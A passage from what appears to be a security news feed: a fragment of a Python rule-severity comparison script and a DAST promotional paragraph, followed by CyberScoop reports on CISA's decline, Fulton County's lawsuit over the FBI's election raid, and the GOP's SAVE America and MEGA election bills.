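        environment="staging", tls_terminated_upstream=True, auth_at_gateway=True))
    for rule in sorted(set(naive) | set(informed)):
        print(f"{rule:18} context-free: {naive.get(rule, '-'):9} context-aware: {informed.get(rule, '-')}")
```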

Developer overhead

For organizations seeking to minimize developer burden, DAST is frequently the preferred option over SAST. DAST processes evolve alongside your web applications, continuing to scan them so that your business can promptly identify and remediate emerging issues. Let’s finish by taking a look at a range of underlying dynamics that make DAST an easy decision for developers looking to fortify application security (see the table below).

[Image: Developer-overhead-DAST-capability-chart.png]

Moving away from insecure mail

2 March 2026 at 03:42
ON SECURITY By Susan Bradley Tax season provides an opportunity for businesses to do better. Before I get started, note that I’m writing this as an accounting professional in the United States. By their very nature, my observations will be US-centric. But the truth is that the underlying concept is the security of sensitive information, […]

Across party lines and industry, the verdict is the same: CISA is in trouble

25 February 2026 at 06:00

“Decimated.” 

“Amateur hour.”

“Pretty much fallen apart.”

“It’s really hard to find something positive to say right now.”

It’s been a little more than one year into the second Trump administration, and there’s a large consensus, if not total unanimity, among those who have worked with and for the Cybersecurity and Infrastructure Security Agency: It has suffered significantly during that time. 

CISA has lost roughly a third of its personnel and shuttered entire divisions. Observers across the political spectrum told CyberScoop for this story that even on its core missions, like coordinating with industry and protecting federal networks, the agency is significantly diminished.

Many sources that spoke with CyberScoop did so under the condition of anonymity, in order to be more candid or avoid retribution. They told CyberScoop that CISA’s biggest problems, and their consequences, include:

  • Trump’s ire over the 2020 election results has led to the agency being deprioritized within the administration. Congress has yet to approve the administration’s permanent pick to lead the agency, Sean Plankey, and lawmakers have failed to do other things to strengthen it. 
  • CISA’s capabilities have been significantly diminished by the loss of personnel, expertise and programs. 
  • In the absence of a permanent leader, Acting Director Madhu Gottumukkala has struggled to lead the agency. “I don’t think anybody would argue he’s doing a great job,” one industry source said.
  • Organizations that previously turned to CISA for help now seek alternatives, like industry alliances, outside consultants or government-to-government partnerships.

Where to assign blame varied from source to source. Most criticized both the administration and Congress, though some faulted one more than the other.

Some see bright spots in CISA under the current administration. And while many are pessimistic about the agency’s future, others expressed optimism.

But the first year reviews are not glowing.

“Year one was a tough year for the agency,” said House Homeland Security Committee Chairman Andrew Garbarino, R-N.Y. He noted that a “lot of the best and brightest have left the agency,” though he expressed optimism about Plankey’s ability to turn CISA around. “The amount of cyberattacks that our nation is seeing every day, both on the private side and on the federal government side — you want your best people there fighting against it, and if they’re somewhere else, it definitely leaves us all vulnerable.”

Said Mississippi Rep. Bennie Thompson, the top Democrat on Garbarino’s panel: “It’s tough to have a robust entity when you cut the money… we are weaker because of CISA’s lack of manpower.”

When priorities shifted

Trump has harbored animosity toward CISA since 2020, when it contradicted his false claims related to widespread electoral fraud. He and his allies built on that animosity, recommending in Project 2025 that the agency be dismantled, divided by its core responsibilities, and farmed out to other federal agencies. 

“There was uniquely a target on its back,” said one CISA official who left in 2025. That hostility came from some Republicans in Congress, especially Kentucky Sen. Rand Paul, who chairs the Senate Homeland Security and Governmental Affairs Committee.

Said Thompson: “CISA wasn’t politicized for the most part, until the Trump administration came along and accused them of somehow contributing to his [election] loss.”

CISA has lost substantial personnel, including veterans and whole teams. Some employees were transferred to other divisions in the Department of Homeland Security. Election security was quickly cut. Two information sharing and analysis centers (ISACs) that serve state and local governments lost funding. A division coordinating with foreign governments, businesses and state and local governments was effectively closed.

The agency has lost senior leaders in programs like counter-ransomware initiatives, threat hunting and secure software development. Contracts for things like detecting threats in critical infrastructure networks, tracking vulnerabilities and collaborating with industry teetered, albeit sometimes only temporarily. 

DHS has unraveled multiple programs in which CISA plays a key role, such as by dismissing members of the Cyber Safety Review Board and disbanding the Critical Infrastructure Partnership Advisory Council. Congress has lurched between letting both a key state and local cyber grant program and a cyber threat information sharing law lapse and temporarily re-upping them.

The departures and program changes likely haven’t ended, either. 

“It’s not a very harmonious place right now,” said one industry source. “I hear from people that are looking to leave.” Former CISA employees say those who remain either believe strongly in the mission, or are simply keeping their heads down until retirement from federal service.

“People I talk to say the morale is really low,” said James Lewis, distinguished fellow with the tech policy program at the Center for European Policy Analysis think tank.

CISA and DHS officials routinely say the changes are designed to get the agency “back on mission.” Lewis, industry officials and others say CISA probably never needed to get involved in combatting misinformation and disinformation, roles that rankled some conservatives, but the agency largely halted that work prior to Trump returning to office.

Some saw duplication and redundancy at CISA as legitimate problems. “I did see overlap between who was actually doing policy and who was actually doing the operational work,” said Ari Schwartz, managing director of cybersecurity services at the law firm Venable and a former Obama administration cybersecurity official.

It was not long ago that CISA experienced rapid budget growth, particularly after its establishment in 2018.

“As with any organization, the first few years are growth years and after a while, the agency needed to reevaluate how it was operating and meeting its statutory authorities,” said Kate DiEmidio, who formerly served as the agency’s director of legislative affairs and acting chief external affairs officer. “There was a need for the agency to refocus.”

Even among those who saw the need for change at CISA, though, many saw the Trump administration as going way too far. “CISA needed surgery,” Lewis said, but “what it needed was surgery with a scalpel, not a sledgehammer.” He added, “Not only is the White House hostile to CISA, but cybersecurity isn’t a priority for them.”

A question of capacity

The cuts have created real-world consequences for cybersecurity coordination. Former officials and industry partners describe broken relationships, unanswered requests for help and serious questions about whether CISA can handle a major crisis. The coordination and engagement that defined the agency’s approach have largely diminished.

The end result is that “they’ve dismantled all of those capabilities in units within government,” said Caitlin Durkovich, a former DHS official in the Obama administration and White House official in the Biden administration. She recently started a firm with former top CISA official Jeff Greene that offers services CISA has scaled back, such as security assessments.

“It’s been really hard to watch,” Greene said, how CISA has been working with the private sector and local governments on “developing a level of trust that is weakening or gone.”

One industry source said they used to meet regularly with top officials, but now can’t get a response. “We’ve got really good engagement elsewhere in government. We really would like the opportunity to do the same thing with CISA,” they said. “Some of the trust that had been built up has been eroded.”

Thompson said the biggest losses have been in election security and secure-by-design, areas where his staff says personnel has been “decimated.”

Said another industry source: “I do feel like that when people, if organizations, want to reach out to CISA, it’s not clear who’s there… If we got into a major conflict, let’s say, with China, and they start triggering Volt Typhoon-related malware, are we organized and ready to roll? I don’t think so.”

Another former CISA official described the current situation as a “lack of capacity,” especially when it comes to coordinating with state and local governments and others on a regional basis.

“A bunch of regions are really grappling with the loss of really key personnel who were the ones that were establishing and maintaining these relationships, and really trying to build the trust between the agency and the private sector, and especially in critical infrastructure,” they said. “Not having as many people to help do that national coordinating function that CISA is supposed to do is a real issue.”

They also said there are fewer people working in “flagship programs” like secure-by-design and developing regulations for the landmark Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA). “People are overstretched,” they said. “They’re not doing all the things that they could or should be doing, or want to be doing, and I think that you see evidence of that with talk from the private sector and their inability to reach people and to get help.”

Schwartz said he worries about when “an incident happens, do they have the people to go in, go to the states, go locally, and really do the work that’s needed, as they did in the past? Because they’ve lost some of that ability.”

Lewis said that “overall, the impression is it’s a much weaker entity than it was a year ago.”

“Their power was in their ability to act as a focal point, to coordinate, to bring people together, and just the publication of vulnerabilities and some of the things they were starting to get into in the previous administration were big steps forward that’s been diminished because they don’t have the people now,” he said. “So a smaller organization, that’s just not going to be as powerful.”

State and local governments say they’ve lost critical connections with CISA and have had to turn to one another to fill the gaps.

“We’re asking states to do a job they’re not resourced to do, while weakening the one federal agency designed to help them,” said Errol Weiss, chief security officer at the Health-ISAC. “This is precisely where you do need a strong, centralized federal security function. We already have a national shortage of cybersecurity experts, and you can’t just replicate that expertise 50 times over.”

Overall, Weiss said industry partners have felt the lack of outreach from the agency. “Fewer touchpoints, fewer briefings, fewer problem‑solving calls,” he told CyberScoop, adding that there’s “a growing perception that CISA is being hollowed out where it matters most to industry: stakeholder engagement, collaborative forums, and operational support during incidents.”

Rob Knake, a former top Biden administration official, recently said that “CISA as an organization has pretty much fallen apart.”

Leadership in limbo

One near-universal sentiment is that as Sean Plankey’s nomination to lead the agency drags on in the Senate, the agency is worse off.

“We need to start this year off right, and we’re already in February and can’t get Plankey confirmed,” Garbarino said. “There’s nothing better than having a Senate-confirmed person running the show.”

The acting director has also faced criticism beyond the operational issues. Gottumukkala, who served as South Dakota’s chief information officer under Kristi Noem before she became DHS secretary, has faced fire from both parties for his stewardship.

A string of embarrassing stories has emerged about Gottumukkala, from the tale of him failing a polygraph test and seeking to oust those who administered it; to his reported attempted ouster of veteran agency CIO Robert Costello; to his reported uploading of sensitive contract data to ChatGPT. DHS has defended Gottumukkala amid those revelations.

Reading stories like that, “It just sounds like amateur hour,” said one former CISA employee.

“I don’t think he’s up to the task. I believe that he’s not the best person, and I think he is just somebody the secretary likes, because they both are from South Dakota,” Thompson said. “I don’t know anybody before this administration who would be in sensitive areas and not have passed minimal standards like the polygraph.”

The ChatGPT story drew concern from the right by Senate Judiciary Chairman Chuck Grassley, R-Iowa, as well as from conservative figure Laura Loomer (the latter of whose remarks were racially tinged). Others were more perturbed by the lie detector story.

“When you have security issues with someone in a leadership position, you should find another place for them to go,” said a former Trump administration national security official. “There are plenty of competent people in DHS, in CISA, who could hold things together until Sean Plankey gets there. There are lots of serious things CISA needs to be working on right now. This is a drag on that. It’s not a place where you want any type of friction at the top.”

Garbarino was more generous, noting Gottumukkala’s technical background. DiEmidio also noted Gottumukkala’s technical skills. But Garbarino and Nevada Rep. Mark Amodei, the GOP chairman of the House Appropriations Subcommittee on Homeland Security, have been seeking CISA’s organizational plans to no avail.

“I don’t think he’s intentionally lying to us by saying there’s no reorg plan,” Garbarino said. “But there’s got to be some reasoning behind all these moves, moving the people around, or layoffs or whatever. I want to give him the benefit of the doubt that he is the technical guy that has been given a non-technical job to do.”

Schwartz and some others largely blame Congress for CISA’s current woes, since it hasn’t approved Plankey as a full-time, permanent leader. “A lot of the issue is the fact that [it] just doesn’t have the leadership to be able to participate in senior-level discussions,” he said.

What’s left to build on

Despite myriad complaints, many observers still see value in the current iteration of CISA. Some are hopeful about its ability to rebound, too.

CISA says it’s still devoted to its missions. The agency published a 2025 year-in-review about its accomplishments.

“CISA remains steadfast in its mission to safeguard the systems Americans rely on by strengthening federal network defenses, empowering businesses, and fortifying critical infrastructure nationwide,” Gottumukkala said in a statement to CyberScoop.

Moving forward, “we will deepen collaboration with trusted partners, prioritize highly skilled technical professionals, and direct resources for maximum impact—accelerating innovation, operational coordination, and workforce right-sizing to reduce long-term risks while maintaining strong industry partnerships and cost efficiency,” he said. “The CISA leadership and workforce remains committed to this mission despite a small minority who are upset that accountability and reform have come to the agency.”

It’s a message Gottumukkala recently delivered to Congress. “He tried to give the impression that we haven’t lost any capacity,” Thompson said. “I wasn’t impressed.”

Others said CISA is still carrying out many of its old tasks, such as issuing public alerts on vulnerabilities and threats.

“There’s still some good reporting coming out,” Greene said. “But what I can’t know is the volume of what they can put out versus what they used to be able to put out.”

Weiss said “CISA still has tremendous value in areas only the federal government can truly provide: national‑level visibility, cross‑sector coordination and the ability to marshal resources across agencies in a crisis.” But it’s not clear whether CISA can rise to the occasion like it did during the 2024 Change Healthcare crisis.

“All of this means it’s more important than ever for the private sector to take the initiative,” he said. “Critical infrastructure owners and operators cannot assume the federal government will have the capacity to step in the way it once did.”

Weiss and others also said that CISA has refocused on federal networks, but others, such as Lewis, said it’s also diminished there. “That’s their primary mission, and they don’t have the policies or the bodies to do that,” Lewis said.

Garbarino and a number of industry sources say they’re encouraged by the idea that the Trump administration could write less onerous regulations for CIRCIA, with an earlier draft drawing bipartisan and industry criticism.

A Senate-confirmed leader could further brighten the agency’s prospects, many agree. “They still have some good talent there. It’s not totally that we’ve lost everything there,” Schwartz said. “If you have leadership in there, then you can build it up.”

DiEmidio said some of the staff changes have made sense. Election security had more people than other sectors that needed the help, she said. 

“In some ways, I think the external attention to CISA’s mission in the media and with Congress was completely focused on one or two things, and the focus on the things that really matter, and the good work that CISA is doing got overshadowed,” she said. For the agency’s cybersecurity division and other cyber teams, “there were several incidents over the summer where those teams were incredible. They were working evenings, weekends.”

But many agree that rebuilding CISA’s workforce will be difficult.

The Trump administration has deliberately made working for the federal government challenging as a matter of policy. Russell Vought, head of the Office of Management and Budget, said before the election that the goal was to put federal workers “in trauma.” Morale at CISA has been particularly bad, sources say. Periodic DHS shutdowns haven’t helped.

On the plus side for CISA, it’s a bad labor market, Lewis said.

Some of what CISA needs to do going forward is about managing expectations, said DiEmidio.

“What I would want to make sure is that CISA has a hiring plan in place to start hiring, especially in those key technical positions at all levels,” she said. “I think you have to have an understanding that people are going to rotate in and out of government. Not everyone wants to stay in government long term and that’s okay.”

But there are some worries about CISA recruiting going forward. “Just the way they handle the departures, for a lot of folks, I don’t think it gives a lot of encouragement to individuals that ‘Hey, this is a great place to work,’” said one former DHS official.

The post Across party lines and industry, the verdict is the same: CISA is in trouble appeared first on CyberScoop.

Deleted, but not deleted

23 February 2026 at 03:43
ON SECURITY By Susan Bradley You’ve probably seen the chilling video by now — that masked man at the door in one of the highest-profile kidnappings in recent memory. But here’s something you may have missed, something many would consider equally chilling: the doorbell-camera footage was not configured to be kept! It was recovered by […]

Fulton County lawsuit claims feds used ‘gross mischaracterizations’ to justify raid

By: djohnson
18 February 2026 at 10:59

A former federal official who tested and certified voting machines used in Fulton County, Georgia for the 2020 presidential election told a court that the federal government misrepresented key facts and omitted exculpatory public evidence while seeking a warrant in last month’s law enforcement raid.

The raid, carried out by the FBI and overseen by Director of National Intelligence Tulsi Gabbard, saw agents seize ballots and other documentation from the Fulton County election offices. A public affidavit cited five core allegations related to the county’s recordkeeping, electronic ballot image storage, and election night reporting. Authorities allege these issues point to a potential conspiracy to intentionally manipulate the vote count in favor of Democrat Joe Biden.

Fulton County officials sued the federal government in response, arguing that the affidavit used to obtain a warrant for the raid “does not identify facts that establish probable cause that anyone committed a crime.”

Another filing includes sworn testimony from Ryan Macias, an elections expert who tested and certified the county’s voting machines while at the Election Assistance Commission. In his testimony, Macias told the court that the government’s key claims have already been investigated and have been found to be baseless.  

He said the FBI’s “many individual omissions and misstatements” in its affidavit reflect “gross mischaracterizations” of how elections work and directly contradict the conclusions of multiple prior investigations into the Nov. 2020 election in Fulton County.

“Once the statements and omissions in the Affidavit are corrected and based on my experience administering elections, the Affidavit does not have a substantial basis in reality,” Macias stated.

For instance, the FBI’s affidavit cites the absence of scanned images of all 527,925 ballots for the original count and recount. But Macias, who served as an adviser to Fulton County and witnessed pre- and post-election operations in 2020, said this was standard practice. Jurisdictions typically send only the vote count records from their machines on election night, because ballot images and audit logs are much larger files that can slow down the reporting process.

Macias also notes that the FBI affidavit omits that this issue was already investigated by Republican Secretary of State Brad Raffensperger, who found Georgia election workers weren’t required by law to preserve such images until a state law passed in 2021.

An investigator from Raffensperger’s office later told the Board of Elections that it was “important to note that ballots can be scanned and tabulated without capturing ballot images,” while general counsel Charlene McGowan testified that ballot images play no role in the vote tabulation process and Fulton County’s paper ballots – counted three times – were the “most important” documents to verify the count.

“These explanations about the storing of ballot images have been publicly available for some time,” Macias noted.

Similarly, the FBI cites instances where some Fulton County ballots were scanned multiple times, claiming it shows evidence of “an intentional tabulation of ballots in a false matter” to make the recount and original vote counts match. The bureau also pointed to small, non-determinative differences between the county’s machine recount and totals from a hand-counted risk-limiting audit.

But the federal government again failed to mention in its petition for a warrant that these claims were “exhaustively” investigated by the Secretary of State’s office, which found the errors were benign, the duplicates weren’t counted, and did not impact the final vote count in the state’s count of the 2020 presidential contest.

According to Macias, the government’s affidavit also contains errors about basic facts of Fulton County’s reporting process, including misreporting the official vote count and the date and time it was transmitted to state officials for tabulation.

The post Fulton County lawsuit claims feds used ‘gross mischaracterizations’ to justify raid appeared first on CyberScoop.

GOP Congress moves to shape election law in Trump’s image

By: djohnson
11 February 2026 at 08:21

Republicans in Congress are moving ahead with two pieces of legislation this week that would dramatically reshape the nation’s election laws.

Together, the SAVE America Act and MEGA Act would shift key voter certification powers to the executive branch, require stricter proof of citizenship for voter registration, and allow states to more easily access federal immigration databases to track and remove “potential” or “suspected” noncitizens from voter rolls.

The SAVE America Act passed through the Rules Committee late Tuesday on a 9-4 partisan split, teeing up a full House vote on the bill. The bill would require voters to use a passport, birth certificate or REAL ID to register to vote, and to prove their identity and citizenship in person.

Changes to the committee bill include a new section requiring states to send lists of all eligible voters to the Department of Homeland Security’s Systematic Alien Verification for Entitlements database and placing the Commissioner of the Social Security Administration at the head of a federal voter citizenship certification process.

Rep. Bryan Steil, R-Wis., said a manager’s amendment filed overnight would also exempt overseas military voters and their families from in-person identification requirements and make the law effective immediately.

Additionally on Tuesday, the House Committee on Administration held a hearing on another bill, the MEGA Act, also sponsored by Steil. That bill would discount all mail-in ballots received after the close of polls on Election Day, require the Attorney General to certify election funding for states, and authorize the AG to sue states that don’t comply with federal election requirements.

It would also allow private individuals to sue any election official “who registers an applicant to vote in an election for Federal office who fails to present documentary proof of United States citizenship.”

The data tells a different story

Steil cast counting ballots past Election Day as untrustworthy, comparing it to playing a corrupt card game.

“Imagine if you went to a casino and played cards and you’re playing with the dealer, and at the very end…the dealer says ‘You know what, I’m not going to flip over my cards for three or four days,’ ” he said. “You could be playing with the pope and you wouldn’t have a lot of confidence in exactly what is taking place.”

But the delays in counting ballots in three states in the 2020 election – Pennsylvania, Wisconsin and Michigan – had a clear explanation: state laws prevented election officials from processing mail-in ballots until Election Day or the day before, forcing them to prioritize in-person votes first before moving to mail-in ballots – which ended up leaning heavily Democratic.

New research from the Center for Election Integrity and Research released this week found that many claims of suspected noncitizen voting are wildly inflated when investigated. Executive director David Becker said the data gives “a very good sense of the depth of the problem” around noncitizen voting, which he called “infinitesimally rare.”

“President Trump’s own Department of Homeland Security has checked more than 49 million voter records, and they themselves admit that 99.98% of those records represented confirmed citizens,” Becker said in a statement. “In several states that are politically aligned with President Trump, the number of alleged noncitizen voters has precipitously dropped when subjected to scrutiny.”

Congressional Democrats unanimously opposed the bills, arguing they would disenfranchise legal voters in an effort to address a problem that post-election audits show is exceedingly rare.

Rep. Julie Johnson, D-Texas, said Congress must respect “the fundamental constitutional right of every citizen to cast a ballot.” The bill’s requirements would affect citizens without birth certificates or passports, married women who have changed their names, and voters with limited access to election offices where they must prove citizenship in person.

“The problem with this bill is you’re putting all these administrative burdens in place to keep citizens from voting,” she said, adding later that “it is unamerican, unconstitutional, and just dead ass wrong.”

A decade of finger pointing 

It’s not clear what authorities or figures Steil was citing to justify the bill. For instance, approximately 98 percent of voters already cast their ballot on voting machines with a paper backup record.

Further, election experts don’t say winners must be declared on Election Day. Many argue the opposite: that calling races too early—or refusing to count ballots that are legally postmarked on Election Day but take days to arrive—can disenfranchise legitimate voters.

The MEGA Act has support from GOP-controlled states. Wyoming Secretary of State Chuck Gray told lawmakers Tuesday it would impose “baseline common sense standards” for elections nationwide. Gray also said he stood “in complete support of” President Trump’s March 2025 executive order on elections—though major sections of that order have since been struck down by courts for being unconstitutional. 

After the 2016 election, Republicans resisted national election administration laws, arguing states should control election administration.

Now, they face similar arguments about their legislative package.

Rep. Jim McGovern, D-Mass., said it was “preposterous that the same Republicans who spent their entire careers demanding that states – not the federal government, states – should run their elections are now suddenly begging for federal intervention.”

Karen Brinson Bell, who led North Carolina’s State Board of Elections until last year, warned that the bill’s rigid photo ID mandates would override current systems in most states, even those that already have voter ID laws. She also said the requirements would impose a one-size-fits-all approach on election systems that have diverse, locally driven needs.

“The needs of communities in Wyoming differ from those in Michigan and North Carolina,” Brinson Bell said. “Decentralized election administration is a feature, not a bug, of our democratic system.”

The post GOP Congress moves to shape election law in Trump’s image appeared first on CyberScoop.
